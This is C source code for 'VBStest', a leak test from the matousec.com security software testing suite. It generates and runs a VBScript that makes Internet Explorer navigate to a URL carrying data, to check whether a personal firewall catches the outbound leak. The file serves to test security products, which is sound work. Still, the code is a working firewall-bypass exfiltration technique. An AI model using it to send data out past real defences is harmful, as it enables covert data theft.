/*

 Security Software Testing Suite - VBStest (leak-test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * Based on the original code and idea by Nail Kaipov, Jetico, Inc., http://www.jetico.com/.


 Method description:

   * Create and execute Visual Basic script that creates an instance of Internet Explorer with a URL as a command line
     parameter. This URL parameter, which also contains the data to transmit, redirects Internet Explorer to the Internet webpage.

*/

#include <stdio.h>
#include <windows.h>
#include <wininet.h>
#include "include/common.h"
#include "include/common-leak.h"
#include "include/common-hook.h"


int main(int argc,char *argv[])
{
  COM_CONF conf;
  if (!com_console_init_main("VBStest","vbstest",argc,argv,&conf,COM_TEST_TYPE_VBSTEST)) return 1;

  char *used_dlls[]={"ntdll.dll","kernel32.dll","shell32.dll"};
  if (!com_hook_load_libraries(used_dlls,3)) return 1;

  DeleteUrlCacheEntry(conf.uri);

  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  char modpath[MAX_PATH];
  if (com_get_module_path(NULL,modpath,sizeof(modpath),&err_inf))
  {
    wchar_t vbspath[MAX_PATH];
    snwprintf(vbspath,sizeof(vbspath)/sizeof(wchar_t),L"%S\\vbstest.vbs",modpath);
    vbspath[sizeof(vbspath)/sizeof(wchar_t)-1]=L'\0';

    int file_ready=FALSE;
    int file_delete=FALSE;
    HANDLE file=CreateFileW(vbspath,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
    if (file!=INVALID_HANDLE_VALUE)
    {
      file_delete=TRUE;
      if (com_verbosity_get()) printf("File \"%S\" created.\n",vbspath);

      char content[COM_INET_URI_MAX_LEN+256];
      snprintf(content,sizeof(content),"set ie=CreateObject(\"InternetExplorer.Application\")\n"
                                       "ie.Visible = true\n"
                                       "ie.Navigate(\"%s\")\n",conf.uri);
      content[sizeof(content)-1]='\0';

      size_t len=strlen(content);

      DWORD written=0;
      if (WriteFile(file,content,len,&written,NULL))
      {
        if (com_verbosity_get()) printf("The content, %ld bytes, has been written to the file \"%S\".\n\n",written,vbspath);

        file_ready=TRUE;
      } else com_err_set(&err_inf,"Unable to write data to a file \"%S\".\n",vbspath);

      CloseHandle(file);
    } else com_err_set(&err_inf,"Unable to create file \"%S\".\n",vbspath);

    if (file_ready)
    {
      SHELLEXECUTEINFOW sei;
      memset(&sei,0,sizeof(sei));
      sei.cbSize=sizeof(sei);
      sei.fMask=0;
      sei.lpVerb=L"open";
      sei.lpFile=vbspath;
      sei.nShow=SW_SHOW;

      if (ShellExecuteExW(&sei))
      {
        char buffer[4096];
        res=com_attempt_check_ie_cache(buffer,sizeof(buffer),&conf,10000,&err_inf)
         && com_find_pattern_and_print_data(buffer,sizeof(buffer),&conf,&err_inf);
      } else com_err_set(&err_inf,"Unable to run script \"%S\".\n",vbspath);
    }

    if (file_delete) DeleteFileW(vbspath);
  }

  return com_end(res,&err_inf,&conf);
}
